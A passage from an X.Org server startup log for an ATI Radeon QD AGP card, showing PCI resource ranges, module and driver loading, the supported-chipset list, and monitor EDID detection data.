	[2] -1	0	0xdd000000 - 0xdd07ffff (0x80000) MX[B](B)
	[3] -1	0	0xd0000000 - 0xd7ffffff (0x8000000) MX[B](B)
	[4] -1	0	0x0000e000 - 0x0000e0ff (0x100) IX[B]E
	[5] -1	0	0x0000dc00 - 0x0000dcff (0x100) IX[B]E
	[6] -1	0	0x0000d800 - 0x0000d8ff (0x100) IX[B]E
	[7] -1	0	0x0000d400 - 0x0000d4ff (0x100) IX[B]E
	[8] -1	0	0x0000d000 - 0x0000d0ff (0x100) IX[B]E
	[9] -1	0	0x0000c000 - 0x0000c0ff (0x100) IX[B](B)
(II) Active PCI resource ranges after removing overlaps:
	[0] -1	0	0xdf000000 - 0xdfffffff (0x1000000) MX[B]E
	[1] -1	0	0xd8000000 - 0xd7ffffff (0x0) MX[B]EO
	[2] -1	0	0xdd000000 - 0xdd07ffff (0x80000) MX[B](B)
	[3] -1	0	0xd0000000 - 0xd7ffffff (0x8000000) MX[B](B)
	[4] -1	0	0x0000e000 - 0x0000e0ff (0x100) IX[B]E
	[5] -1	0	0x0000dc00 - 0x0000dcff (0x100) IX[B]E
	[6] -1	0	0x0000d800 - 0x0000d8ff (0x100) IX[B]E
	[7] -1	0	0x0000d400 - 0x0000d4ff (0x100) IX[B]E
	[8] -1	0	0x0000d000 - 0x0000d0ff (0x100) IX[B]E
	[9] -1	0	0x0000c000 - 0x0000c0ff (0x100) IX[B](B)
(II) OS-reported resource ranges after removing overlaps with PCI:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[5] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
(II) All system resource ranges:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0xdf000000 - 0xdfffffff (0x1000000) MX[B]E
	[5] -1	0	0xd8000000 - 0xd7ffffff (0x0) MX[B]EO
	[6] -1	0	0xdd000000 - 0xdd07ffff (0x80000) MX[B](B)
	[7] -1	0	0xd0000000 - 0xd7ffffff (0x8000000) MX[B](B)
	[8] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[9] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
	[10] -1	0	0x0000e000 - 0x0000e0ff (0x100) IX[B]E
	[11] -1	0	0x0000dc00 - 0x0000dcff (0x100) IX[B]E
	[12] -1	0	0x0000d800 - 0x0000d8ff (0x100) IX[B]E
	[13] -1	0	0x0000d400 - 0x0000d4ff (0x100) IX[B]E
	[14] -1	0	0x0000d000 - 0x0000d0ff (0x100) IX[B]E
	[15] -1	0	0x0000c000 - 0x0000c0ff (0x100) IX[B](B)
(II) extmod will be loaded. This was enabled by default and also specified in the config file.
(II) dbe will be loaded. This was enabled by default and also specified in the config file.
(II) glx will be loaded by default.
(II) freetype will be loaded. This was enabled by default and also specified in the config file.
(II) type1 will be loaded by default.
(II) record will be loaded by default.
(II) dri will be loaded by default.
(II) LoadModule: dbe
(II) Loading /usr/local/lib/xorg/modules/extensions//libdbe.so
(II) Module dbe: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.0
	Module class: X.Org Server Extension
	ABI class: X.Org Server Extension version 0.3
(II) Loading extension DOUBLE-BUFFER
(II) LoadModule: extmod
(II) Loading /usr/local/lib/xorg/modules/extensions//libextmod.so
(II) Module extmod: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.0
	Module class: X.Org Server Extension
	ABI class: X.Org Server Extension version 0.3
(II) Loading extension SHAPE
(II) Loading extension MIT-SUNDRY-NONSTANDARD
(II) Loading extension BIG-REQUESTS
(II) Loading extension SYNC
(II) Loading extension MIT-SCREEN-SAVER
(II) Loading extension XC-MISC
(II) Loading extension XFree86-VidModeExtension
(II) Loading extension XFree86-Misc
(II) Loading extension DPMS
(II) Loading extension TOG-CUP
(II) Loading extension Extended-Visual-Information
(II) Loading extension XVideo
(II) Loading extension XVideo-MotionCompensation
(II) Loading extension X-Resource
(II) LoadModule: freetype
(II) Loading /usr/local/lib/xorg/modules/fonts//libfreetype.so
(II) Module freetype: vendor=X.Org Foundation &amp; the After X-TT Project
	compiled for 1.4.0 module version = 2.1.0
	Module class: X.Org Font Renderer
	ABI class: X.Org Font Renderer version 0.5
(II) Loading font FreeType
(II) LoadModule: glx
(II) Loading /usr/local/lib/xorg/modules/extensions//libglx.so
(II) Module glx: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.0
	ABI class: X.Org Server Extension version 0.3
(==) AIGLX disabled
(II) Loading extension GLX
(II) LoadModule: type1
(II) Loading /usr/local/lib/xorg/modules/fonts//libtype1.so
(II) Module type1: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.2
	Module class: X.Org Font Renderer
	ABI class: X.Org Font Renderer version 0.5
(II) Loading font Type1
(II) LoadModule: record
(II) Loading /usr/local/lib/xorg/modules/extensions//librecord.so
(II) Module record: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.13.0
	Module class: X.Org Server Extension
	ABI class: X.Org Server Extension version 0.3
(II) Loading extension RECORD
(II) LoadModule: dri
(II) Loading /usr/local/lib/xorg/modules/extensions//libdri.so
(II) Module dri: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.0
	ABI class: X.Org Server Extension version 0.3
(II) Loading extension XFree86-DRI
(II) LoadModule: radeon
(II) Loading /usr/local/lib/xorg/modules/drivers//radeon_drv.so
(II) Module radeon: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 4.3.0
	Module class: X.Org Video Driver
	ABI class: X.Org Video Driver version 2.0
(II) LoadModule: ati
(II) Loading /usr/local/lib/xorg/modules/drivers//ati_drv.so
(II) Module ati: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 6.7.192
	Module class: X.Org Video Driver
	ABI class: X.Org Video Driver version 2.0
(II) LoadModule: mouse
(II) Loading /usr/local/lib/xorg/modules/input//mouse_drv.so
(II) Module mouse: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.2.2
	Module class: X.Org XInput Driver
	ABI class: X.Org XInput driver version 2.0
(II) LoadModule: kbd
(II) Loading /usr/local/lib/xorg/modules/input//kbd_drv.so
(II) Module kbd: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.2.2
	Module class: X.Org XInput Driver
	ABI class: X.Org XInput driver version 2.0
(II) ATI: ATI driver wrapper (version 6.7.192) for chipsets: mach64 rage128 radeon
(II) Primary Device is: PCI 01:00:0
(II) Loading sub module radeon
(II) LoadModule: radeon
(II) Reloading /usr/local/lib/xorg/modules/drivers//radeon_drv.so
(II) RADEON: Driver for ATI Radeon chipsets: ATI Radeon QD (AGP)
	ATI Radeon QE (AGP) ATI Radeon QF (AGP) ATI Radeon QG (AGP)
	ATI Radeon VE/7000 QY (AGP/PCI) ATI Radeon VE/7000 QZ (AGP/PCI)
	ATI ES1000 515E (PCI) ATI ES1000 5969 (PCI)
	ATI Radeon Mobility M7 LW (AGP)
	ATI Mobility FireGL 7800 M7 LX (AGP)
	ATI Radeon Mobility M6 LY (AGP) ATI Radeon Mobility M6 LZ (AGP)
	ATI Radeon IGP320 (A3) 4136 ATI Radeon IGP320M (U1) 4336
	ATI Radeon IGP330/340/350 (A4) 4137
	ATI Radeon IGP330M/340M/350M (U2) 4337
	ATI Radeon 7000 IGP (A4+) 4237 ATI Radeon Mobility 7000 IGP 4437
	ATI FireGL 8700/8800 QH (AGP) ATI Radeon 8500 QL (AGP)
	ATI Radeon 9100 QM (AGP) ATI Radeon 8500 AIW BB (AGP)
	ATI Radeon 8500 AIW BC (AGP) ATI Radeon 7500 QW (AGP/PCI)
	ATI Radeon 7500 QX (AGP/PCI) ATI Radeon 9000/PRO If (AGP/PCI)
	ATI Radeon 9000 Ig (AGP/PCI) ATI FireGL Mobility 9000 (M9) Ld (AGP)
	ATI Radeon Mobility 9000 (M9) Lf (AGP)
	ATI Radeon Mobility 9000 (M9) Lg (AGP)
	ATI Radeon 9100 IGP (A5) 5834
	ATI Radeon Mobility 9100 IGP (U3) 5835 ATI Radeon 9100 PRO IGP 7834
	ATI Radeon Mobility 9200 IGP 7835 ATI Radeon 9250 5960 (AGP)
	ATI Radeon 9200 5961 (AGP) ATI Radeon 9200 5962 (AGP)
	ATI Radeon 9200SE 5964 (AGP) ATI FireMV 2200 (PCI)
	ATI Radeon Mobility 9200 (M9+) 5C61 (AGP)
	ATI Radeon Mobility 9200 (M9+) 5C63 (AGP) ATI Radeon 9500 AD (AGP)
	ATI Radeon 9500 AE (AGP) ATI Radeon 9600TX AF (AGP)
	ATI FireGL Z1 AG (AGP) ATI Radeon 9700 Pro ND (AGP)
	ATI Radeon 9700/9500Pro NE (AGP) ATI Radeon 9600TX NF (AGP)
	ATI FireGL X1 NG (AGP) ATI Radeon 9600 AP (AGP)
	ATI Radeon 9600SE AQ (AGP) ATI Radeon 9600XT AR (AGP)
	ATI Radeon 9600 AS (AGP) ATI FireGL T2 AT (AGP)
	ATI FireGL RV360 AV (AGP)
	ATI Radeon Mobility 9600/9700 (M10/M11) NP (AGP)
	ATI Radeon Mobility 9600 (M10) NQ (AGP)
	ATI Radeon Mobility 9600 (M11) NR (AGP)
	ATI Radeon Mobility 9600 (M10) NS (AGP)
	ATI FireGL Mobility T2 (M10) NT (AGP)
	ATI FireGL Mobility T2e (M11) NV (AGP) ATI Radeon 9650
	ATI Radeon 9800SE AH (AGP) ATI Radeon 9800 AI (AGP)
	ATI Radeon 9800 AJ (AGP) ATI FireGL X2 AK (AGP)
	ATI Radeon 9800PRO NH (AGP) ATI Radeon 9800 NI (AGP)
	ATI FireGL X2 NK (AGP) ATI Radeon 9800XT NJ (AGP)
	ATI Radeon X600 (RV380) 3E50 (PCIE)
	ATI FireGL V3200 (RV380) 3E54 (PCIE)
	ATI Radeon Mobility X600 (M24) 3150 (PCIE)
	ATI Radeon Mobility X300 (M24) 3152 (PCIE)
	ATI FireGL M24 GL 3154 (PCIE) ATI Radeon X300 (RV370) 5B60 (PCIE)
	ATI Radeon X600 (RV370) 5B62 (PCIE)
	ATI Radeon X550 (RV370) 5B63 (PCIE)
	ATI FireGL V3100 (RV370) 5B64 (PCIE)
	ATI FireMV 2200 PCIE (RV370) 5B65 (PCIE)
	ATI Radeon Mobility X300 (M22) 5460 (PCIE)
	ATI Radeon Mobility X600 SE (M24C) 5462 (PCIE)
	ATI FireGL M22 GL 5464 (PCIE) ATI Radeon XPRESS 200 5A41 (PCIE)
	ATI Radeon XPRESS 200M 5A42 (PCIE)
	ATI Radeon XPRESS 200 5A61 (PCIE)
	ATI Radeon XPRESS 200M 5A62 (PCIE)
	ATI Radeon XPRESS 200 5954 (PCIE)
	ATI Radeon XPRESS 200M 5955 (PCIE)
	ATI Radeon XPRESS 200 5974 (PCIE)
	ATI Radeon XPRESS 200M 5975 (PCIE) ATI FireGL V5000 (RV410) (PCIE)
	ATI Mobility FireGL V5000 (M26) (PCIE)
	ATI Mobility FireGL V5000 (M26) (PCIE)
	ATI Mobility Radeon X700 XL (M26) (PCIE)
	ATI Mobility Radeon X700 (M26) (PCIE)
	ATI Mobility Radeon X700 (M26) (PCIE)
	ATI Radeon X700 PRO (RV410) (PCIE)
	ATI Radeon X700 XT (RV410) (PCIE) ATI Radeon X700 (RV410) (PCIE)
	ATI Radeon X700 SE (RV410) (PCIE) ATI Radeon X700 SE (RV410) (PCIE)
	ATI Radeon X800 (R420) JH (AGP) ATI Radeon X800PRO (R420) JI (AGP)
	ATI Radeon X800SE (R420) JJ (AGP) ATI Radeon X800 (R420) JK (AGP)
	ATI Radeon X800 (R420) JL (AGP) ATI FireGL X3 (R420) JM (AGP)
	ATI Radeon Mobility 9800 (M18) JN (AGP)
	ATI Radeon X800XT (R420) JP (AGP) ATI Radeon X800 SE (R420) (AGP)
	ATI Radeon AIW X800 VE (R420) JT (AGP)
	ATI Radeon X800 (R423) UH (PCIE)
	ATI Radeon X800PRO (R423) UI (PCIE)
	ATI Radeon X800LE (R423) UJ (PCIE)
	ATI Radeon X800SE (R423) UK (PCIE)
	ATI FireGL V5100 (R423) UQ (PCIE)
	ATI FireGL unknown (R423) UR (PCIE)
	ATI FireGL unknown (R423) UT (PCIE)
	ATI Radeon X800XT (R423) 5D57 (PCIE) ATI FireGL V7100 (R423) (PCIE)
	ATI Mobility FireGL V5100 (M28) (PCIE)
	ATI Mobility Radeon X800 (M28) (PCIE)
	ATI Mobility Radeon X800 XT (M28) (PCIE)
	ATI Radeon X800 (R430) (PCIE) ATI Radeon X800 XL (R430) (PCIE)
	ATI Radeon X800 SE (R430) (PCIE) ATI Radeon X800 XTP (R430) (PCIE)
	ATI Radeon X850 5D4C (PCIE)
	ATI unknown Radeon / FireGL (R480) 5D50 (PCIE)
	ATI Radeon X850 SE (R480) (PCIE) ATI Radeon X850 PRO (R480) (PCIE)
	ATI Radeon X850 XT (R480) (PCIE)
	ATI Radeon X850 XT PE (R480) (PCIE)
	ATI Radeon X850 PRO (R480) (AGP) ATI Radeon X850 SE (R480) (AGP)
	ATI Radeon X850 XT (R480) (AGP) ATI Radeon X850 XT PE (R480) (AGP)
(--) Assigning device section with no busID to primary device
(--) Chipset ATI Radeon QD (AGP) found
(II) resource ranges after xf86ClaimFixedResources() call:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0xdf000000 - 0xdfffffff (0x1000000) MX[B]E
	[5] -1	0	0xd8000000 - 0xd7ffffff (0x0) MX[B]EO
	[6] -1	0	0xdd000000 - 0xdd07ffff (0x80000) MX[B](B)
	[7] -1	0	0xd0000000 - 0xd7ffffff (0x8000000) MX[B](B)
	[8] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[9] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
	[10] -1	0	0x0000e000 - 0x0000e0ff (0x100) IX[B]E
	[11] -1	0	0x0000dc00 - 0x0000dcff (0x100) IX[B]E
	[12] -1	0	0x0000d800 - 0x0000d8ff (0x100) IX[B]E
	[13] -1	0	0x0000d400 - 0x0000d4ff (0x100) IX[B]E
	[14] -1	0	0x0000d000 - 0x0000d0ff (0x100) IX[B]E
	[15] -1	0	0x0000c000 - 0x0000c0ff (0x100) IX[B](B)
(II) resource ranges after probing:
	[0] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[1] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[2] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[3] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[4] -1	0	0xdf000000 - 0xdfffffff (0x1000000) MX[B]E
	[5] -1	0	0xd8000000 - 0xd7ffffff (0x0) MX[B]EO
	[6] -1	0	0xdd000000 - 0xdd07ffff (0x80000) MX[B](B)
	[7] -1	0	0xd0000000 - 0xd7ffffff (0x8000000) MX[B](B)
	[8] 0	0	0x000a0000 - 0x000affff (0x10000) MS[B]
	[9] 0	0	0x000b0000 - 0x000b7fff (0x8000) MS[B]
	[10] 0	0	0x000b8000 - 0x000bffff (0x8000) MS[B]
	[11] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[12] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
	[13] -1	0	0x0000e000 - 0x0000e0ff (0x100) IX[B]E
	[14] -1	0	0x0000dc00 - 0x0000dcff (0x100) IX[B]E
	[15] -1	0	0x0000d800 - 0x0000d8ff (0x100) IX[B]E
	[16] -1	0	0x0000d400 - 0x0000d4ff (0x100) IX[B]E
	[17] -1	0	0x0000d000 - 0x0000d0ff (0x100) IX[B]E
	[18] -1	0	0x0000c000 - 0x0000c0ff (0x100) IX[B](B)
	[19] 0	0	0x000003b0 - 0x000003bb (0xc) IS[B]
	[20] 0	0	0x000003c0 - 0x000003df (0x20) IS[B]
(II) Setting vga for screen 0.
(II) RADEON(0): MMIO registers at 0xdd000000: size 512KB
(==) RADEON(0): Write-combining range (0xdd0000000x80000) was already clear
(II) RADEON(0): PCI bus 1 card 0 func 0
(**) RADEON(0): Depth 16 (--) framebuffer bpp 16
(II) RADEON(0): Pixel depth = 16 bits stored in 2 bytes (16 bpp pixmaps)
(==) RADEON(0): Default visual is TrueColor
(II) Loading sub module vgahw
(II) LoadModule: vgahw
(II) Loading /usr/local/lib/xorg/modules//libvgahw.so
(II) Module vgahw: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 0.1.0
	ABI class: X.Org Video Driver version 2.0
(II) RADEON(0): vgaHWGetIOBase: hwp-&gt;IOBase is 0x03d0 hwp-&gt;PIOOffset is 0x0000
(==) RADEON(0): RGB weight 565
(II) RADEON(0): Using 6 bits per RGB (8 bit DAC)
(==) RADEON(0): X server will not keep DPI constant for all screen sizes
(II) Loading sub module int10
(II) LoadModule: int10
(II) Loading /usr/local/lib/xorg/modules//libint10.so
(II) Module int10: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.0
	ABI class: X.Org Video Driver version 2.0
(II) RADEON(0): initializing int10
(==) RADEON(0): Write-combining range (0xa00000x20000) was already clear
(==) RADEON(0): Write-combining range (0xc00000x40000) was already clear
(II) RADEON(0): Primary V_BIOS segment is: 0xc000
(==) RADEON(0): Write-combining range (0x00x1000) was already clear
(--) RADEON(0): Chipset: ATI Radeon QD (AGP) (ChipID = 0x5144)
(--) RADEON(0): Linear framebuffer at 0xd0000000
(II) RADEON(0): AGP card detected
(II) RADEON(0): Legacy BIOS detected
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 7 (OK)
drmOpenByBusid: Searching for BusID pci:0000:01:00.0
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 7 (OK)
drmOpenByBusid: drmOpenMinor returns 7
drmOpenByBusid: drmGetBusid reports pci:0000:01:00.0
(II) RADEON(0): [dri] Found DRI library version 1.3.0 and kernel module version 1.25.0
(==) RADEON(0): Page Flipping disabled
(II) RADEON(0): Will try to use DMA for Xv image transfers
(II) RADEON(0): Detected total video RAM=32768K accessible=65536K (PCI BAR=131072K)
(--) RADEON(0): Mapped VideoRAM: 32768 kByte (128 bit DDR SDRAM)
(II) RADEON(0): Color tiling enabled by default
(II) RADEON(0): Max desktop size set to 2048x1200
(II) RADEON(0): For a larger or smaller max desktop size add a Virtual line to your xorg.conf
(II) Loading sub module ddc
(II) LoadModule: ddc(II) Module ddc already built-in
(II) Loading sub module i2c
(II) LoadModule: i2c(II) Module i2c already built-in
(II) RADEON(0): PLL parameters: rf=2700 rd=60 min=12000 max=35000 xclk=16600
(WW) RADEON(0): No Connector Info Table found!
(II) RADEON(0): Output DVI-0 using monitor section My Monitor
(II) RADEON(0): I2C bus DVI_DDC initialized.
(II) RADEON(0): Output VGA-0 has no monitor section
(II) RADEON(0): I2C bus VGA_DDC initialized.
(II) RADEON(0): Port0:
 Monitor   -- AUTO
 Connector -- DVI-I
 DAC Type  -- TVDAC/ExtDAC
 TMDS Type -- Internal
 DDC Type  -- DVI_DDC
(II) RADEON(0): Port1:
 Monitor   -- AUTO
 Connector -- VGA
 DAC Type  -- Primary
 TMDS Type -- None
 DDC Type  -- VGA_DDC
(II) RADEON(0): I2C device DVI_DDC:ddc2 registered at address 0xA0.
(II) RADEON(0): I2C device DVI_DDC:ddc2 removed.
(II) RADEON(0): I2C device DVI_DDC:ddc2 registered at address 0xA0.
(II) RADEON(0): I2C device DVI_DDC:ddc2 removed.
(II) RADEON(0): I2C device DVI_DDC:ddc2 registered at address 0xA0.
(II) RADEON(0): I2C device DVI_DDC:ddc2 removed.
(II) RADEON(0): DDC Type: 2 Detected Monitor Type: 0
(II) RADEON(0): Detected Monitor Type: 0
finished output detect: 0
(II) RADEON(0): I2C device VGA_DDC:ddc2 registered at address 0xA0.
(II) RADEON(0): DDC Type: 3 Detected Monitor Type: 1
(II) RADEON(0): EDID data from the display on connector: VGA ----------------------
(II) RADEON(0): Manufacturer: PTW  Model: 309  Serial#: 15222
(II) RADEON(0): Year: 2004  Week: 47
(II) RADEON(0): EDID Version: 1.1
(II) RADEON(0): Analog Display Input  Input Voltage Level: 0.700/0.300 V
(II) RADEON(0): Sync:  Separate
(II) RADEON(0): Max H-Image Size [cm]: horiz.: 32  vert.: 24
(II) RADEON(0): Gamma: 1.27
(II) RADEON(0): DPMS capabilities: StandBy Suspend Off RGB/Color Display
(II) RADEON(0): redX: 0.618 redY: 0.349   greenX: 0.280 greenY: 0.605
(II) RADEON(0): blueX: 0.152 blueY: 0.063   whiteX: 0.281 whiteY: 0.310
(II) RADEON(0): Supported VESA Video Modes:
(II) RADEON(0): 720x400@70Hz
(II) RADEON(0): 640x480@60Hz
(II) RADEON(0): 800x600@60Hz
(II) RADEON(0): 800x600@75Hz
(II) RADEON(0): 1024x768@60Hz
(II) RADEON(0): 1024x768@75Hz
(II) RADEON(0): Manufacturer's mask: 0
(II) RADEON(0): Supported Future Video Modes:
(II) RADEON(0): #0: hsize: 640  vsize 480  refresh: 85  vid: 22833
(II) RADEON(0): #1: hsize: 800  vsize 600  refresh: 85  vid: 22853
(II) RADEON(0): #2: hsize: 800  vsize 600  refresh: 100  vid: 26693
(II) RADEON(0): #3: hsize: 1024  vsize 768  refresh: 85  vid: 22881
(II) RADEON(0): #4: hsize: 1280  vsize 1024  refresh: 60  vid: 32897
(II) RADEON(0): Supported additional Video Mode:
(II) RADEON(0): clock: 36.0 MHz   Image Size:  320 x 240 mm
(II) RADEON(0): h_active: 640  h_sync: 696  h_sync_end 752 h_blank_end 832 h_border: 0
(II) RADEON(0): v_active: 480  v_sync: 481  v_sync_end 484 v_blanking: 509 v_border: 0
(II) RADEON(0): Supported additional Video Mode:
(II) RADEON(0): clock: 56.2 MHz   Image Size:  320 x 240 mm
(II) RADEON(0): h_active: 800  h_sync: 832  h_sync_end 896 h_blank_end 1048 h_border: 0
(II) RADEON(0): v_active: 600  v_sync: 601  v_sync_end 604 v_blanking: 631 v_border: 0
(II) RADEON(0): Supported additional Video Mode:
(II) RADEON(0): clock: 94.5 MHz   Image Size:  320 x 240 mm
(II) RADEON(0): h_active: 1024  h_sync: 1072  h_sync_end 1168 h_blank_end 1376 h_border: 0
(II) RADEON(0): v_active: 768  v_sync: 769  v_sync_end 772 v_blanking: 808 v_border: 0
(II) RADEON(0): Ranges: V min: 50  V max: 160 Hz H min: 30  H max: 70 kHz PixClock max 110 MHz
(II) RADEON(0): EDID (in hex):
(II) RADEON(0): 	00ffffffffffff0042970903763b0000
(II) RADEON(0): 	2f0e01010820181be85c119e59479b27
(II) RADEON(0): 	10484fa14a0031594559456861598180
(II) RADEON(0): 	000000000000100e80c020e01d103838
(II) RADEON(0): 	130040f010000018f91520f830581f20
(II) RADEON(0): 	2040130040f01000001eea2400604100
(II) RADEON(0): 	28303060130040f01000001e000000fd
(II) RADEON(0): 	0032a01e460b000a202020202020002b
finished output detect: 1
finished all detect
before xf86InitialConfiguration
(II) RADEON(0): I2C device DVI_DDC:ddc2 registered at address 0xA0.
(II) RADEON(0): I2C device DVI_DDC:ddc2 removed.
(II) RADEON(0): I2C device DVI_DDC:ddc2 registered at address 0xA0.
(II) RADEON(0): I2C device DVI_DDC:ddc2 removed.
(II) RADEON(0): I2C device DVI_DDC:ddc2 registered at address 0xA0.
(II) RADEON(0): I2C device DVI_DDC:ddc2 removed.
(II) RADEON(0): DDC Type: 2 Detected Monitor Type: 0
(II) RADEON(0): Detected Monitor Type: 0
(II) RADEON(0): DDC Type: 3 Detected Monitor Type: 1
(II) RADEON(0): EDID data from the display on connector: VGA ----------------------
(II) RADEON(0): Manufacturer: PTW  Model: 309  Serial#: 15222
(II) RADEON(0): Year: 2004  Week: 47
(II) RADEON(0): EDID Version: 1.1
(II) RADEON(0): Analog Display Input  Input Voltage Level: 0.700/0.300 V
(II) RADEON(0): Sync:  Separate
(II) RADEON(0): Max H-Image Size [cm]: horiz.: 32  vert.: 24
(II) RADEON(0): Gamma: 1.27
(II) RADEON(0): DPMS capabilities: StandBy Suspend Off RGB/Color Display
(II) RADEON(0): redX: 0.618 redY: 0.349   greenX: 0.280 greenY: 0.605
(II) RADEON(0): blueX: 0.152 blueY: 0.063   whiteX: 0.281 whiteY: 0.310
(II) RADEON(0): Supported VESA Video Modes:
(II) RADEON(0): 720x400@70Hz
(II) RADEON(0): 640x480@60Hz
(II) RADEON(0): 800x600@60Hz
(II) RADEON(0): 800x600@75Hz
(II) RADEON(0): 1024x768@60Hz
(II) RADEON(0): 1024x768@75Hz
(II) RADEON(0): Manufacturer's mask: 0
(II) RADEON(0): Supported Future Video Modes:
(II) RADEON(0): #0: hsize: 640  vsize 480  refresh: 85  vid: 22833
(II) RADEON(0): #1: hsize: 800  vsize 600  refresh: 85  vid: 22853
(II) RADEON(0): #2: hsize: 800  vsize 600  refresh: 100  vid: 26693
(II) RADEON(0): #3: hsize: 1024  vsize 768  refresh: 85  vid: 22881
(II) RADEON(0): #4: hsize: 1280  vsize 1024  refresh: 60  vid: 32897
(II) RADEON(0): Supported additional Video Mode:
(II) RADEON(0): clock: 36.0 MHz   Image Size:  320 x 240 mm
(II) RADEON(0): h_active: 640  h_sync: 696  h_sync_end 752 h_blank_end 832 h_border: 0
(II) RADEON(0): v_active: 480  v_sync: 481  v_sync_end 484 v_blanking: 509 v_border: 0
(II) RADEON(0): Supported additional Video Mode:
(II) RADEON(0): clock: 56.2 MHz   Image Size:  320 x 240 mm
(II) RADEON(0): h_active: 800  h_sync: 832  h_sync_end 896 h_blank_end 1048 h_border: 0
(II) RADEON(0): v_active: 600  v_sync: 601  v_sync_end 604 v_blanking: 631 v_border: 0
(II) RADEON(0): Supported additional Video Mode:
(II) RADEON(0): clock: 94.5 MHz   Image Size:  320 x 240 mm
(II) RADEON(0): h_active: 1024  h_sync: 1072  h_sync_end 1168 h_blank_end 1376 h_border: 0
(II) RADEON(0): v_active: 768  v_sync: 769  v_sync_end 772 v_blanking: 808 v_border: 0
(II) RADEON(0): Ranges: V min: 50  V max: 160 Hz H min: 30  H max: 70 kHz PixClock max 110 MHz
(II) RADEON(0): EDID (in hex):
(II) RADEON(0): 	00ffffffffffff0042970903763b0000
(II) RADEON(0): 	2f0e01010820181be85c119e59479b27
(II) RADEON(0): 	10484fa14a0031594559456861598180
(II) RADEON(0): 	000000000000100e80c020e01d103838
(II) RADEON(0): 	130040f010000018f91520f830581f20
(II) RADEON(0): 	2040130040f01000001eea2400604100
(II) RADEON(0): 	28303060130040f01000001e000000fd
(II) RADEON(0): 	0032a01e460b000a202020202020002b
in RADEONProbeOutputModes
(II) RADEON(0): EDID vendor PTW prod id 777
(II) RADEON(0): Output DVI-0 disconnected
(II) RADEON(0): Output VGA-0 connected
(II) RADEON(0): Output VGA-0 using initial mode 1280x1024
after xf86InitialConfiguration
(==) RADEON(0): DPI set to (75 75)
(II) Loading sub module fb
(II) LoadModule: fb
(II) Loading /usr/local/lib/xorg/modules//libfb.so
(II) Module fb: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.0.0
	ABI class: X.Org ANSI C Emulation version 0.3
(==) RADEON(0): Using gamma correction (1.0 1.0 1.0)
(II) Loading sub module ramdac
(II) LoadModule: ramdac(II) Module ramdac already built-in
(==) RADEON(0): Using XAA acceleration architecture
(II) Loading sub module xaa
(II) LoadModule: xaa
(II) Loading /usr/local/lib/xorg/modules//libxaa.so
(II) Module xaa: vendor=X.Org Foundation
	compiled for 1.4.0 module version = 1.2.0
	ABI class: X.Org Video Driver version 2.0
(==) RADEON(0): Assuming overlay scaler buffer width is 1536
(II) RADEON(0): No MM_TABLE found - assuming CARD is not TV-in capable.
(==) RADEON(0): Write-combining range (0x00x1000) was already clear
(!!) RADEON(0): For information on using the multimedia capabilities
	of this adapter please see http://gatos.sf.net.
(II) do I need RAC?  No I don't.
(II) resource ranges after preInit:
	[0] 0	0	0xdd000000 - 0xdd07ffff (0x80000) MX[B]
	[1] 0	0	0xd0000000 - 0xd7ffffff (0x8000000) MX[B]
	[2] -1	0	0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
	[3] -1	0	0x000f0000 - 0x000fffff (0x10000) MX[B]
	[4] -1	0	0x000c0000 - 0x000effff (0x30000) MX[B]
	[5] -1	0	0x00000000 - 0x0009ffff (0xa0000) MX[B]
	[6] -1	0	0xdf000000 - 0xdfffffff (0x1000000) MX[B]E
	[7] -1	0	0xd8000000 - 0xd7ffffff (0x0) MX[B]EO
	[8] -1	0	0xdd000000 - 0xdd07ffff (0x80000) MX[B](B)
	[9] -1	0	0xd0000000 - 0xd7ffffff (0x8000000) MX[B](B)
	[10] 0	0	0x000a0000 - 0x000affff (0x10000) MS[B](OprU)
	[11] 0	0	0x000b0000 - 0x000b7fff (0x8000) MS[B](OprU)
	[12] 0	0	0x000b8000 - 0x000bffff (0x8000) MS[B](OprU)
	[13] 0	0	0x0000c000 - 0x0000c0ff (0x100) IX[B]
	[14] -1	0	0x0000ffff - 0x0000ffff (0x1) IX[B]
	[15] -1	0	0x00000000 - 0x000000ff (0x100) IX[B]
